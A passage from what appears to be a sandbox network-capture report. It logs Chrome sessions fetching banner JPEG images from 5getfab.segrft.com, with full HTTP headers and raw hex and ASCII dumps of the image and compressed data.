                                                      2025-01-12 23:47:56 UTC4096INData Raw: a3 d5 55 9d 9d 07 cb d2 51 2b ca c0 40 81 12 14 a4 33 8b ad a4 02 c6 58 22 ad 4e a4 33 73 49 c5 cf 22 04 03 35 d8 2a 11 45 cc 55 4a 9c e5 6a 60 de 83 a6 e0 d3 68 a5 5e 0f 19 a2 b6 d4 6a b5 56 aa 5b a7 27 81 89 0d 93 be 2e 2d 9d 6d 7d 52 46 70 06 38 ec 34 54 83 33 33 c1 71 49 59 9e d9 1b 63 b5 0a 79 fb 16 67 4b 8e 07 f4 18 da b0 30 77 95 42 ee 9d 7f 38 cf 8e 2f 9f 06 0d 34 90 08 f8 11 ad bd e5 89 97 5c 34 6e 61 58 d4 55 85 24 ef db 99 5e 56 71 f9 9e 8a 42 34 9e 85 81 7d 90 59 07 a1 a2 36 03 0c ae 4e 0b 44 14 5e a4 fc 67 12 4e 4a 80 59 44 7b f2 08 d2 8c 04 8e 11 63 8b 8a ef 86 7c 88 1c 29 55 4a a5 ca d2 a9 da ca d2 29 75 ed 94 84 67 9b b4 c1 15 d9 f4 6e 53 ad 34 c6 eb 77 63 a7 c1 cd ff f2 8b 6e 5f df dc 8c 80 0d 61 5e f2 82 2c df 9a b1 d4 02 05 a9 cd 8c 8d
                                                      Data Ascii: UQ+@3X"N3sI"5*EUJj`h^jV['.-m}RFp84T33qIYcygK0wB8/4\4naXU$^VqB4}Y6ND^gNJYD{c|)UJ)ugnS4wcn_a^,
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 15 69 e5 bb 13 a3 a2 20 60 c4 67 67 b7 ea 12 d3 94 15 e1 3e 0a 36 3b 24 24 0e 54 e9 14 11 c2 f4 3d 68 0f 4d 84 cb 12 ca 8a a3 77 f4 bf 70 ef dd bb 87 d3 c0 83 c7 6c a2 25 be 90 86 f5 b3 76 85 f9 75 6f 6f d1 8f ed 32 31 26 74 62 4a 98 4e 12 31 97 ba 47 25 a4 c6 b1 cf 8b 80 84 f6 50 85 94 c1 50 87 4b c3 df 1c 03 0c 7e e3 47 57 c2 6a 85 8b 5b b0 7b 80 ef 02 44 c3 0e d2 21 00 89 85 03 36 ea f1 94 94 94 bc a7 fe 67 36 07 c1 99 61 61 64 61 d1 d3 6b 19 6f 8e 16 f5 4e 6e c9 8f 8e 0b ac cf 6f f5 89 e1 27 17 14 24 17 bc 60 68 0e eb d8 7b 5d e6 82 da 82 9c f6 b6 cc cc 4c 58 15 12 c0 54 4d 17 05 96 58 11 ad 96 32 32 42 24 92 88 38 76 88 3c 96 1a 02 f7 07 0e ae 20 92 08 30 bd 84 d5 94 7d f7 14 9c 5f 6e a0 d4 f2 f9 b1 75 2c 88 1b 28 92 22 6d bc 68 dc f3 ec 4f fa 7f ec
                                                      Data Ascii: i `gg>6;$$T=hMwpl%vuoo21&tbJN1G%PPK~GWj[{D!6g6aadakoNno'$`h{]LXTMX22B$8v< 0}_nu,("mhO
                                                      2025-01-12 23:47:56 UTC1773INData Raw: c9 df 31 89 f5 06 ba 44 8d 51 c3 c2 e4 5c 4c 22 11 9e e7 71 44 98 48 6f 31 68 0c 3c 11 4f aa ec ce ce 4e 94 ee 8c 73 75 77 03 1c b3 8d 6c 30 d4 60 7c 90 c8 e0 a0 a7 95 2f 89 18 a0 bd 9d f2 49 e9 c9 f8 d6 89 89 89 21 73 d8 8e cb 17 2f 5e 4e 1d 50 50 f8 1d 55 70 6c f9 45 28 7f 2d 3e 1d 06 4f 71 5c b2 17 68 cc 9b 0d 44 52 b2 3d 19 75 f2 24 90 06 52 06 0c 7d 29 ae d6 24 32 a0 20 91 91 59 35 0f df 6c de 5a 53 d3 5c c6 8e e0 c8 18 8c e8 a4 34 ef b4 ab f9 b7 6e 0e 37 d5 d6 d5 01 8d 9a f1 8d f3 da 20 23 bc 20 2d d4 19 bf a6 b1 87 30 ae b0 38 ac e4 9c 92 ab 8d 95 43 72 65 0a 59 0a 4c 21 84 94 c2 11 c9 c4 a2 54 ad 46 29 13 f1 04 ea a1 a8 a8 c3 d1 87 33 56 b8 b8 bb 07 7b 0c 7a 00 0e 64 ce 2e 5e 7e a8 ff 58 b2 0a 4a 1d e3 ed ae ae 0d f1 46 dd ee 09 e9 10 c3 ee 9d d4
                                                      Data Ascii: 1DQ\L"qDHo1h<ONsuwl0`|/I!s/^NPPUplE(->Oq\hDR=u$R})$2 Y5lZS\4n7 # -08CreYL!TF)3V{zd.^~XJF


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      95192.168.2.44984420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC616OUTGET /images_plus/other/banner2.jpg?ver=1606891698 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 32120
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:18 GMT
                                                      ETag: "5fc738b2-7d78"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:56 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 02 02 02 02 01 02 02 02 02 03 02 02 03 03 06 04 03 03 03 03 07 05 05 04 06 08 07 09 08 08 07 08 08 09 0a 0d 0b 09 0a 0c 0a 08 08 0b 0f 0b 0c 0d 0e 0e 0f 0e 09 0b 10 11 10 0e 11 0d 0e 0e 0e ff db 00 43 01 02 03 03 03 03 03 07 04 04 07 0e 09 08 09 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e 0e ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 01 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 03 02 04 05 06 07 08 09 01 0a ff c4 00 1c 01 01 01 00 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 02 04 05 06 07 01 08 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 fe 7f
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 5f 73 b0 46 d7 99 53 20 65 0e 95 15 9d 98 92 f0 e4 6c 3c f7 b1 2e 73 59 c8 24 a4 b8 52 23 f4 11 96 aa 46 46 52 46 00 00 00 00 00 00 00 04 80 12 00 48 09 0a 89 93 17 00 90 52 64 e6 2a 24 2a 4e 42 4d 84 93 9c 89 cc 5c 11 d2 75 15 27 21 4a 75 15 27 4a 82 40 46 08 d4 85 4b 79 ad 5b 16 ec ba 16 be e7 68 d7 be 69 9f 50 21 38 7e 53 f3 dd e1 ac e7 2a 80 29 05 2a 55 82 9f ca 52 0b 12 dd 48 ca 48 c0 00 00 00 00 00 00 00 a8 a8 a8 a8 15 15 15 15 12 12 27 70 0a 8a 93 aa 93 90 a8 91 8c cc 6a 26 a4 e4 4e 42 a2 4a 4c 48 99 3b 82 a4 e9 24 2a 64 63 20 00 11 94 90 b2 b5 5a de 74 b3 a6 c5 ac f2 e8 1a fb 1d 1a 79 70 9d 88 e3 f6 31 93 00 06 29 23 52 96 54 91 90 a9 24 e9 09 6e 42 5b a9 19 18 00 00 00 00 00 00 00 15 15 12 00 48 09 09 09 13 fd 2e 0f d0 9d 54 9c 84 84 84 c9 d5 54
                                                      Data Ascii: _sFS el<.sY$R#FFRFHRd*$*NBM\u'!Ju'J@FKy[hiP!8~S*)*URHH'pj&NBJLH;$*dc Ztyp1)#RT$nB[H.TT
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 8d 62 c6 d9 d2 48 dd d7 c6 a4 8d ee 45 9f 3d 73 e8 00 37 36 34 6d a0 5a e2 c2 f6 ee 3e 9d 19 cc 27 90 b5 bc 6f 07 a0 21 61 24 ac 32 d7 2b e0 fe 1c 68 4e b0 dd 48 01 e1 f3 e9 b1 58 90 63 49 25 d1 8b 80 fb e6 ab a0 7b ba 27 e2 4c 38 a6 d9 12 67 d6 a0 2c 6b 58 15 89 0a b2 93 68 a4 2a 47 45 36 1a 3f f4 eb c2 cb 23 ce 78 8b 24 05 0d af 7e c2 95 05 40 c3 63 46 0b f0 33 a8 15 01 3b 95 ff 00 d1 46 8e 80 8c f1 8f 60 dd 0e a2 da db 8c b0 80 67 32 eb 90 dc 8c 8e fe 9d b4 94 e3 b8 0e 18 ef f9 94 ad d9 b5 a5 18 cc 77 74 46 da 41 99 83 1c 75 97 21 04 88 c7 e5 8e 25 34 4f de 91 8d ef 0f bf 18 09 5e 0f 70 58 8f 7c 55 f9 1b f1 b2 48 52 e6 1c 8a dc d6 d6 c2 76 31 40 b5 da 6f 16 ca 27 a3 74 7e 5d c1 28 61 39 e9 4a 28 58 d7 44 66 d2 59 76 21 c5 6c 99 1d fd 91 60 85 8f 5e d9
                                                      Data Ascii: bHE=s764mZ>'o!a$2+hNHXcI%{'L8g,kXh*GE6?#x$~@cF3;F`g2wtFAu!%4O^pX|UHRv1@o't~](a9J(XDfYv!l`^
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 8e 4a 9f 4a fa ad 22 4d 25 80 35 c6 ce 6d 86 c5 f4 4c 74 49 8c 63 c9 f9 99 ae 0e d1 78 0e 84 20 6b 0f 35 e5 e1 e3 2a 2f fe d6 b8 4b 1a 73 83 11 60 78 eb 09 d2 5d 75 e6 c9 0e f2 9b 5d 09 60 22 47 92 32 14 c5 45 ce 92 c8 1c 9e 86 13 97 1a 0d 9c de 4e 1f de 65 5c e2 7e f0 00 ce 41 fb e1 fc 04 f1 d7 11 df bc e2 c3 41 24 91 0f de 72 1d 5f 02 6b 80 a4 e1 0d 5c 27 ec f3 9d c2 03 09 4b d6 5c 66 8b 98 76 2a c6 ed 02 74 7c d4 51 0b 06 3b 83 aa 25 2d 5d b9 21 4a 41 bc c1 38 1d c2 62 c5 37 3d 67 f1 86 e5 fc 93 17 89 40 de 5a 16 ac f1 49 4f b5 ba b7 56 ea dd 5b ab 75 04 74 1b d1 77 ff 00 1a 22 f4 45 fc e0 1d 27 b8 69 3d c3 44 6d df 45 77 70 51 57 b5 72 db f9 6a e6 5a 8c 32 8d 32 dc 06 51 b7 fe aa 3c 54 79 94 71 81 a3 ef fb 28 c1 ff 00 e1 7b d5 c5 bc 77 ec db 5b 6b 67
                                                      Data Ascii: JJ"M%5mLtIcx k5*/Ks`x]u]`"G2ENe\~AA$r_k\'K\fv*t|Q;%-]!JA8b7=g@ZIOV[utw"E'i=DmEwpQWrjZ22Q<Tyq({w[kg
                                                      2025-01-12 23:47:56 UTC4096INData Raw: fc 89 e6 8a b4 ff 00 65 b5 c2 c6 bd 9f 81 7e fc bf 92 d3 8d 06 3a 86 3b 22 ab 1c d4 ad f1 cd 4e 98 ed 02 a4 73 d3 1c f4 c6 e7 0a 59 24 24 01 84 36 e6 51 c7 84 09 48 b5 a5 c8 50 0e 28 a2 93 6a 89 a1 6e 81 9e 59 16 1a b4 a7 ae 9b 99 79 00 4d 70 98 d0 aa 28 86 17 94 5b e5 fd 57 6b c8 12 93 4e f3 a7 52 a2 12 2c 5b b6 4b 33 ec b5 69 be 4c 50 8e 02 1d 2a a5 12 98 4a dd b1 63 3f 8d 2a fd 6d 0b 8a 82 5c 74 a9 50 bd a1 85 e2 11 bd 61 75 29 b6 a9 09 c6 2d 2a a4 73 53 a6 13 5a e1 ac 0e b2 46 d7 fb 0b 37 60 be bb 9d 9c 39 b7 9a 39 39 a1 45 b8 84 40 c4 5c e9 67 42 d8 8b 4e 79 eb 2b 72 cf be e3 cd 2c 8c c0 b0 6e 57 48 90 a1 e9 50 da e8 43 76 e4 bd 9d 63 04 eb ef b0 80 55 29 3c 99 0c 6f 55 15 89 f9 36 ad 63 91 07 dd 56 b7 b8 b2 a4 61 8a a4 a7 71 93 67 ca e5 c5 aa c4 bd
                                                      Data Ascii: e~:;"NsY$$6QHP(jnYyMp([WkNR,[K3iLP*Jc?*m\tPau)-*sSZF7`999E@\gBNy+r,nWHPCvcU)<oU6cVaqg
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 12 dc 69 77 4e 31 20 59 5e e8 5f 27 3c 47 5d 6b 76 90 1a 76 6e d9 8c 75 de 75 34 f9 67 a7 4f c5 5f c5 cf 0b 30 c5 d7 0b a3 9f 0b 3f c6 e6 89 79 c2 26 a4 99 b8 1d 74 d0 0d 97 d1 12 fa 95 17 6f 4c 4b c8 b0 db 92 0e 66 36 1b 16 80 ab bb 42 de 6b 42 0d df bd 07 6a 4a 61 20 12 d4 88 52 8f e8 be 1c 2c 36 db 06 ab 27 09 57 52 24 7f c0 9f d9 8d fd 34 b3 2d 3a c1 d4 ad 2b 61 56 5b af d5 09 a9 d7 6c a2 95 97 bf 9f 08 12 a3 f3 d1 15 5e c4 9a 48 9b 6c 35 e2 14 1b bd 2d a8 ff 00 81 77 ec c2 09 1b 8e 1c 89 d2 02 99 ba 30 9f 7b 98 91 65 c4 e0 b3 20 28 5e 89 78 55 f5 63 c1 cb ce 29 37 ec 7f db 01 f1 8d 5a d2 68 0f 53 d7 75 cb 0e 0e 1a ce 58 0e 89 8f ab 44 2b 38 69 25 6f b0 22 54 29 69 6e b3 1f 6a 98 6d 9a 9b 9f b0 5f a1 ec 55 53 ad db eb a8 ef 4d 98 c1 20 76 cf b6 e4 7b
                                                      Data Ascii: iwN1 Y^_'<G]kvvnuu4gO_0?y&toLKf6BkBjJa R,6'WR$4-:+aV[l^Hl5-w0{e (^xUc)7ZhSuXD+8i%o"T)injm_USM v{
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 9a cd f4 47 3b ae 88 ff 00 18 e3 a1 af da 51 db cd fc 12 38 bf fe 24 2f 42 e1 8f 6b e7 58 ed d4 5f 45 d0 7c 43 70 fc c9 1c b0 97 fa 2f 80 f8 86 bb cb 43 c4 9d 71 3f 22 f4 bc bc 94 bb bf 83 62 01 02 38 7c d7 7e 40 4f 92 7e 6d 31 9d a8 5e 5a e6 64 8b c7 ad 21 7e 2d c6 9d a8 5c f1 2a 43 73 92 d7 79 c4 fe 0e 36 e5 df 51 6f d8 d5 1c 6e 1b 1b dd ef 5b 77 27 bb 0d 95 38 86 c2 4d 33 eb 0b 8b dd 87 ed e6 5c 6d a9 77 f3 d2 2c 3c 2b 78 10 a2 a6 b0 da 80 b4 1e ba 87 6a d6 ba 21 be f8 d6 5a fa 97 9d 22 ad 13 a1 f8 3b a5 ce a9 de d7 dd 85 cc d4 ec bf 2f af 46 bf 46 3b dd a1 2f f1 80 3f 41 c1 e4 59 99 7f a1 c0 2f de 18 6f 43 60 eb a5 c1 0f e8 dc cc 4d 79 25 53 70 db 78 8f c9 34 ed 2f 53 ad 6b 66 a5 17 5b ed 85 43 e4 42 50 2c 35 60 3e 32 62 63 c6 e1 ab 40 85 7d fc 98 3a
                                                      Data Ascii: G;Q8$/BkX_E|Cp/Cq?"b8|~@O~m1^Zd!~-\*Csy6Qon[w'8M3\mw,<+xj!Z";/FF;/?AY/oC`My%Spx4/Skf[CBP,5`>2bc@}:
                                                      2025-01-12 23:47:56 UTC3805INData Raw: 39 38 ae 3e 4c 94 b9 27 ab 53 5c b2 ac a9 c5 d7 2a ab b5 97 89 25 24 c5 77 64 22 db a6 29 29 2a ab b7 62 4d fa 39 e4 a6 a4 b8 eb c3 a7 3d 18 9a df da d5 a9 aa ad da 55 12 c4 9a 24 5d a5 7a ec 81 40 fa 7c 4e 3c 8e 53 4d 6f 89 c1 c9 b9 74 dd 52 58 8a aa d2 8b ba d6 e5 2a ae df c2 b8 f9 4d ee a2 0b 69 55 ba 31 18 4b 13 55 34 82 8f 56 ba 6c aa bb 92 ae d2 4c 4d 71 53 7c 26 b9 14 a5 10 89 94 45 08 82 9f b1 70 bb 81 55 a6 27 c5 0d d9 44 8c f2 ab 67 ed 2b a7 6c e9 2f 25 a8 57 85 12 98 8a 9e 24 d6 a3 72 cf 47 0b 97 8e b1 51 d6 0a 1c 93 4e 51 4d 6e 8d f0 9a e4 fb 93 17 ea 11 ca 25 57 2c cf 55 7e 52 e5 55 39 8a 88 6c bd d0 dc 3c 48 97 4f 2f 77 c6 82 87 30 6e 0a 24 d7 08 bd db b6 ed 73 c9 77 15 5b a4 54 7a 15 e4 86 b0 50 f0 6b 55 52 15 66 7a e3 ad 1a a2 b8 69 25 5a
                                                      Data Ascii: 98>L'S\*%$wd"))*bM9=U$]z@|N<SMotRX*MiU1KU4VlLMqS|&EpU'Dg+l/%W$rGQNQMn%W,U~RU9l<HO/w0n$sw[TzPkURfzi%Z


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      96192.168.2.44984520.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:56 UTC616OUTGET /images_plus/other/banner4.jpg?ver=1606891699 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:56 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:56 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 47441
                                                      Connection: close
                                                      Last-Modified: Wed, 02 Dec 2020 06:48:19 GMT
                                                      ETag: "5fc738b3-b951"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:56 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c2 00 11 08 00 ff 02 bc 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 03 05 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 08 04 05 06 07 09 01 0a ff c4 00 1d 01 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 02 04 05 06 07 08 01 09 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f9
                                                      Data Ascii: JFIFCC
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 53 75 6d 8e ee d4 ba b6 d3 77 6d 8e ea da bb a0 8e ee 8e 39 a9 e3 9d b4 88 16 00 03 c6 c5 bb d5 7a 8f b1 f0 1e 7e ea 9e 9d 9a fc c3 dd 54 31 4f 53 25 90 5e e0 ce 6b 0d ab 81 c7 6d d7 cc d4 30 64 32 69 b0 b3 cf 67 f3 bf 3a f5 6f 4e d6 58 6c 13 47 9e fb 17 d8 f2 15 88 fc 7c 79 f7 30 83 2b 06 7a 4f 89 b1 5c b6 89 6d 83 26 a4 7d 09 da bc d5 0d b0 5d b7 5d 59 6d 81 e9 b0 f0 d7 92 c7 99 e7 77 26 85 3b 73 c1 a8 3a 05 8c 63 e8 58 6d 5d 9d b1 a6 4f 4f 1d 69 4c e2 1e 8b ed 9e 61 e4 be b5 e8 dc 0a d3 63 48 00 81 02 40 00 00 00 50 f2 35 be d5 49 6f 57 24 35 2b 7a f9 2d ab 16 f5 95 41 bf f2 1a 0e b8 b5 d9 b6 35 d6 b5 5f 5d be 0f 69 b0 6c ab fd 5a 34 e2 3a 4d 15 37 34 89 e8 d3 50 47 3d 1c 77 14 c9 e9 e3 9b c4 8d 8e 00 0a 14 05 5d 70 75 c7 6e f2 a4 39 d6 3d 11 8a c3 9f
                                                      Data Ascii: Sumwm9z~T1OS%^km0d2ig:oNXlG|y0+zO\m&}]]Ymw&;s:cXm]OOiLacH@P5IoW$5+z-A5_]ilZ4:M74PG=w]pun9=
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 24 6f 6b 77 ec 29 e9 67 cf 8b c2 48 a0 82 dd 0e e1 1c db 2e 9e 08 b2 0b 58 cd 30 b6 51 38 8c 4e d3 f3 4b dd 25 bd 61 2d b3 f0 ad 07 be c5 99 e4 8d f7 96 c2 fd ba 10 43 e4 3f 2b 19 1a e0 a1 6d b1 d0 42 d7 99 49 58 cd da 7f 26 3a 08 7e 89 9e ac 66 b4 99 36 f3 45 0b f9 ae 14 e6 a1 f2 ef 0d d1 bf 55 e3 7a 4d 5f b8 5c 0c 42 ff 00 e6 1c 7b 6b 59 50 b6 4f 2e ca ab 05 ca b5 e0 d4 00 6c 77 cd 71 9c 2c da e4 96 46 44 b0 ec bf ba b9 34 b5 41 c2 86 d8 68 8d ea 1f 70 8c a0 76 9c bc 22 0b 0a 43 53 35 63 3c 25 51 2d d1 2d 35 4b a1 9d 83 9b 82 3d fa 45 14 e1 d0 69 0b 67 cc d3 5e 0b 95 51 ca a5 65 0f b1 e6 4d 9a 0b ed 4f 15 1e b9 6b 65 8c b4 69 a5 88 7c a2 9a 90 f6 4c 70 3e 40 44 aa 83 10 73 93 52 a1 d4 d7 39 35 08 d1 c3 54 4b ca 0a 86 ed 2a 10 a2 5f 76 03 e2 73 78 d1 33
                                                      Data Ascii: $okw)gH.X0Q8NK%a-C?+mBIX&:~f6EUzM_\B{kYPO.lwq,FD4Ahpv"CS5c<%Q--5K=Eig^QeMOkei|Lp>@DsR95TK*_vsx3
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 12 7f 85 7a 99 ff 00 de b8 e8 3b 3b ea 28 6e 08 e9 7b 90 4b d0 1d 6f a3 7c 18 f1 82 89 48 c5 7d 09 a6 b3 6d 42 50 7e 5e 10 5c b7 d1 ac 24 c6 38 88 9a 5b 5e 67 7a 2b 04 e7 96 76 ed c6 18 e8 d9 41 57 e7 34 a4 92 fa 45 1b 70 23 f7 91 35 2d ba 4d de 3e 1f e1 dc 8a 1f f4 69 92 c9 c5 87 3f b5 1c b0 7c 4e b6 42 92 2a d0 08 db 52 4c 65 6f b4 db cb c9 a8 e5 12 62 4c 20 c7 40 35 d1 ec ee 0d f6 ad 07 b4 31 72 4a 4c 3e f6 59 c7 00 90 5a b9 1a e8 89 1e f2 b5 89 51 0b 28 24 84 e5 71 7f 26 18 55 af 1f 98 2b 65 3c 47 6c 9b af 37 9f 6e 55 2c 59 8e 98 4a cb 86 c8 f1 02 79 9f 99 52 b3 15 ae a2 d4 6a 2e 98 22 59 c7 28 3d 17 ce 5e 29 f5 91 6a f5 85 81 3f b4 84 be 93 9d 8e 42 02 72 95 58 16 ca 6d 64 84 a6 d7 fa 92 dd 46 41 b8 de 66 4f 8a 01 78 43 4f c5 7b ec 3f 2e 48 8e 73 9c
                                                      Data Ascii: z;;(n{Ko|H}mBP~^\$8[^gz+vAW4Ep#5-M>i?|NB*RLeobL @51rJL>YZQ($q&U+e<Gl7nU,YJyRj."Y(=^)j?BrXmdFAfOxCO{?.Hs
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 10 ad fc 43 79 97 8e 4c 40 ab a3 5e c2 e1 87 cf 66 95 89 fe 8f 0c e4 0e 2f 32 ec 86 bc 4f ca 82 85 74 69 f4 2e ab ff 00 42 10 9a 87 41 df cb df a6 b4 11 8e 2a 2a 66 8a 9c f5 d1 53 f4 59 43 5e 3d 68 ba ad 16 58 f5 fa 6a c7 5c 71 0e 49 3a a0 5a c7 eb 19 60 77 93 6b e6 25 a5 c6 d6 44 6b 2d 54 61 15 c7 cf 16 89 05 77 69 ce 2a 98 e2 56 bc 64 cc 32 18 0d c4 f0 d5 d8 6d 61 de 31 a3 99 64 9b 14 c2 81 a9 1a 3b 8a 88 46 06 9f 4d d8 e9 c6 59 42 f5 8e 5a 1d 66 df ef 50 ca 9e ba 1d 43 fd 7a 1c e5 18 39 42 19 ab c4 e6 ae 5f 8b e8 f4 69 da 84 74 44 b5 40 4f 85 f7 f0 4d ee 4b 20 b1 4d 66 29 30 37 31 c9 9d 8e 61 98 f8 38 40 5d 7a 2d d0 4b c1 f6 43 09 65 78 c3 9f c6 8b 5e 30 e7 f1 a2 d7 39 cf e2 c5 af 12 67 f8 b1 2b ac 4f 50 bd ad e1 fc 02 c1 63 55 17 0e 1c 9f 87 ea c8 bf
                                                      Data Ascii: CyL@^f/2Oti.BA**fSYC^=hXj\qI:Z`wk%Dk-Tawi*Vd2ma1d;FMYBZfPCz9B_itD@OMK Mf)071a8@]z-KCex^09g+OPcU
                                                      2025-01-12 23:47:56 UTC4096INData Raw: 70 83 cf fe be 81 db 74 47 72 4c 33 59 fa 95 22 0e 2a 2d 98 9b 7f b8 c3 e2 34 82 be 4e 84 96 36 db e7 f2 c8 ab 0b f7 dd 9a db 91 46 6e 78 bc 28 5a 16 41 f0 08 ca 67 2f 3e 7c 73 c2 d5 e1 57 ff 00 b3 b2 f0 ea ef 6b 5a d5 d5 af af 5f d9 03 f7 f6 87 ef ed 0f d5 af 60 7e fe ce 2f 87 e9 74 69 41 07 da 1f be 82 0b d7 5d 1a 57 46 b4 10 7e ba f4 7d 81 05 5c 5f 0d 74 69 5c 75 c7 41 07 eb ae 8d 28 20 eb a3 5a 08 2a e8 d6 ba 35 af 0d fe f5 e1 bf de bc 3f fa 15 d1 ad 71 d5 e1 fa eb a3 4a e2 f8 6b 8e b8 eb 8e b8 be 1a e8 d7 b3 5a bc 3a e3 ab c3 ae 51 02 f6 23 57 8c 39 fc 68 b5 7f a5 d3 5f eb f6 5e 1d 5e 15 71 7c 35 ad 6b 57 d5 d5 af af 5f d8 c3 f7 fd 20 3e 87 17 c3 d8 10 74 1f bf e8 07 ef a0 82 f5 d0 7e ad 68 20 e8 20 bd 74 10 54 10 7e ba 08 3e c0 83 a0 ac f5 d0 41 fd
                                                      Data Ascii: ptGrL3Y"*-4N6Fnx(ZAg/>|sWkZ_`~/tiA]WF~}\_ti\uA( Z*5?qJkZ:Q#W9h_^^q|5kW_ >t~h tT~>A
                                                      2025-01-12 23:47:56 UTC4096INData Raw: a0 df 4f 67 0b 68 ac 1a 07 9c 58 b2 f4 46 24 ac 81 a2 d3 60 c7 6b 29 b0 43 cc d7 c2 bd 3b c5 44 4f 9f 1c c8 25 72 44 f4 02 69 2b c2 a4 05 61 4f 83 5c b3 0d 50 b3 d0 49 10 c6 23 55 73 b4 e9 10 18 59 20 fb a1 99 33 fe 36 b8 78 a4 cb c8 25 b3 bf af b9 06 ad 7c 64 69 21 9d 48 45 88 01 b1 6f 97 67 58 69 8c 43 d4 aa 8a 23 ce a4 70 7a 9c 49 42 db 6a 23 08 e6 33 79 f5 46 1b 27 46 93 82 06 aa 9c d8 2a 80 2c c5 f9 61 65 33 e2 72 a2 e9 4a 6a 96 1a 9f f3 a3 8e 2d bf a9 9d 7f 9a 80 53 b9 f4 df 79 ed bb 6f a5 18 c5 22 f8 bd 9d 92 ee 7e 5f 88 87 1a b3 87 19 52 41 20 cc a2 aa 16 c8 88 c3 3f 0c e7 06 85 5f aa 3e 3d 6f dd 8e c7 3f 3c 1a 9e 32 2f 65 d3 6f 35 bc 17 bd 04 b8 f7 60 b5 a6 42 d1 ba 9e 29 20 da a7 5e 0d 52 de 85 bc a4 15 39 cd 1a 52 e9 28 59 61 0f 81 82 75 a5 26
